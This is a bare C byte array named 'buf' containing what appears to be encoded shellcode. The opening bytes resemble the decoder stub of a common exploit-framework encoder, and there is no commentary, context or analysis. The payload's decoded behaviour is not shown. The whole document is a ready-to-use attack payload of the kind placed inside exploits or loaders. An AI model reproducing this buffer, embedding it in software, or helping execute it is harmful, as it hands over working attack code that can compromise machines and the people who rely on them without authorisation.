unsigned char buf[] = 
"\xdb\xca\xbb\x79\xa0\x1b\x28\xd9\x74\x24\xf4\x5a\x33\xc9"
"\xb1\x25\x31\x5a\x17\x03\x5a\x17\x83\x93\x5c\xf9\xdd\x05"
"\x27\xef\x1d\xc9\x57\x76\xa7\xb6\x57\x76\xd7\x2e\xe3\x77"
"\xd7\xae\x13\x1e\x6f\xaa\x13\xde\x8f\x7f\x93\xb8\x35\x3f"
"\x94\x44\x4a\xd9\x2d\xd4\x4a\x25\x4e\xb3\xf1\x25\x4e\x3b"
"\x06\x43\xf6\x38\x06\x8b\x06\xf2\x86\x2a\x7b\x0c\x0c\x32"
"\x14\x0c\x2b\x89\x61\x25\x2d\xb7\x8f\x35\xb1\xc7\xe9\x8c"
"\xc9\xc7\xf5\xee\x4f\x7c\xf4\xee\x8f\x82\x91\x56\x8b\x82"
"\x5d\xa7\x59\x02\x3b\x1f\x60\x02\xc4\x5f\x05\xb9\xc4\x5f"
"\xc9\xbd\x09\xdf\xaf\x05\x90\xe0\x2f\x75\xf5\x5b\x2e\x75"
"\xf9\x9b\xfc\xf5\xf9\x9b\xfe\xc4\xca\xa8\xc9\x2c\x19\xfd"
"\x70\x5e\x15\x73\x1e\xec\xf5\x17\x95\x30\x82\xb2\x2d\x44"
"\x0f\x1d\xf4";
